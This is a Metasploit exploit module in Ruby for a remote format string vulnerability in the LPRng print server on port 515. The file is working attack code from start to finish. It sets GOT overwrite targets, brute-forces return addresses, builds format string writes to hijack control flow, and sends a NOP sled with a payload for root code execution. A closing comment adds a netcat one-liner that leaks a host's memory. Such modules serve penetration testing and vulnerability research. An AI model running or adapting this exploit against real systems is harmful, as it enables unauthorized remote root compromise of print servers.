1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Brute
11
  include Msf::Exploit::FormatString
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'LPRng use_syslog Remote Format String Vulnerability',
18
        'Description' => %q{
19
          This module exploits a format string vulnerability in the LPRng print server.
20
          This vulnerability was discovered by Chris Evans. There was a publicly
21
          circulating worm targeting this vulnerability, which prompted RedHat to pull
22
          their 7.0 release. They consequently re-released it as "7.0-respin".
23
        },
24
        'Author' => [ 'jduck' ],
25
        'License' => MSF_LICENSE,
26
        'References' => [
27
          [ 'CVE', '2000-0917' ],
28
          [ 'OSVDB', '421' ],
29
          [ 'BID', '1712' ],
30
          [ 'US-CERT-VU', '382365' ],
31
          [ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ],
32
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ],
33
          [ 'EDB', '226' ],
34
          [ 'EDB', '227' ],
35
          [ 'EDB', '230' ]
36
        ],
37
        'Platform' => 'linux',
38
        'Arch' => ARCH_X86,
39
        'Privileged' => true, # root
40
        'DefaultOptions' => {
41
          'PrependSetresuid' => true
42
        },
43
        'Payload' => {
44
          'Space' => 130, # buffer size on caldera is 180! (need ~50 for fmt)
45
          'BadChars' => "\x00\x0a\x20\x25",
46
        },
47
        'Targets' => [
48
          # tested OK - jjd
49
          [
50
            'Caldera OpenLinux 2.3 Bruteforce',
51
            {
52
              'Platform' => 'linux',
53
              'NumPops' => 243,
54
              'FlowHook' => 0x80992d4, # GOT of exit
55
              # (0x809c180+(41+4+10+48)) - data segment, but gets corrupted
56
              'Bruteforce' =>
57
                {
58
                  'Start' => { 'Ret' => 0xcffffff4 },
59
                  'Stop' => { 'Ret' => 0x7fffe004 },
60
                  'Step' => 16
61
                }
62
            }
63
          ],
64
=begin
65
          # untested (from public exploits)
66
          [ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell',
67
            {
68
              'NumPops' 	=> 299,
69
              'Ret' 	   => 0xbffff640,
70
              'FlowHook'	=> 0xbfffee30
71
            }
72
          ],
73
          [ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5',
74
            {
75
              'NumPops' 	=> 304,
76
              'Ret' 	   => 0xbffff920,
77
              'FlowHook'	=> 0xbffff0f0
78
            }
79
          ],
80
          [ 'RedHat 7.0 - Guinesss',
81
            {
82
              'NumPops' 	=> 300,
83
              'Ret' 	   => 0x41424344,
84
              'FlowHook'	=> 0xbffff3ec
85
            }
86
          ],
87
          [ 'RedHat 7.0 - Guinesss-dev',
88
            {
89
              'NumPops' 	=> 300,
90
              'Ret' 	   => 0x41424344,
91
              'FlowHook'	=> 0xbffff12c
92
            }
93
          ],
94
=end
95
          # ...
96
          [
97
            'Debug',
98
            {
99
              'NumPops' => 1, # sure to miss.
100
              'Ret' => 0x41424344,
101
              'FlowHook'	=> 0x45464748
102
            }
103
          ]
104
        ],
105
        # 'DefaultTarget' => 0,
106
        'DisclosureDate' => '2000-09-25',
107
        'Notes' => {
108
          'Reliability' => UNKNOWN_RELIABILITY,
109
          'Stability' => UNKNOWN_STABILITY,
110
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
111
        }
112
      )
113
      )
114

115
    register_options([ Opt::RPORT(515) ])
116
  end
117

118
  def exploit
119
    # we want to use DPA for this one :)
120
    fmtstr_set_caps(false, true)
121

122
# check syslog to see which number hits 41414141
123
=begin
124
    400.times { |x|
125
      connect
126
      buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1]
127
      sock.put(buf)
128
      #handler
129
      disconnect
130
    }
131
=end
132
    print_status("Trying target #{target.name} ..")
133

134
    super
135
  end
136

137
  def brute_exploit(addrs)
138
    # print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret'])
139

140
    printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ...
141
    num_start = printed.length + 2 + 4
142

143
    # write 'ret' addr to flowhook (execute shellcode)
144
    # NOTE: the resulting two writes must be done at the same time
145

146
    # characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog)
147
    fmtbuf = "_" * 4
148
    fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret'])
149
    # print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")
150

151
    # append payload and newline
152
    # fmtbuf << payload.encoded
153
    fmtbuf << "\x90" * 32
154
    fmtbuf << Rex::Text.charset_exclude(payload_badchars)
155
    fmtbuf << "\n"
156

157
    print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']])
158

159
    connect
160
    # print_status("Sleeping, attach now!!")
161
    # select(nil,nil,nil,5)
162

163
    sock.put(fmtbuf)
164

165
    handler
166
    disconnect
167
  end
168
end
169

170
=begin
171

172
HRM!
173

174
The following causes info leakage!
175

176
bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC
177

178
There are various other ways to trigger the vulnerability. LPD uses the single-byte commands
179
0x01 -> 0x09...
180

181
It's unclear if there is a way to auto-detect the lpd version via LPD commands.
182

183
=end
184

185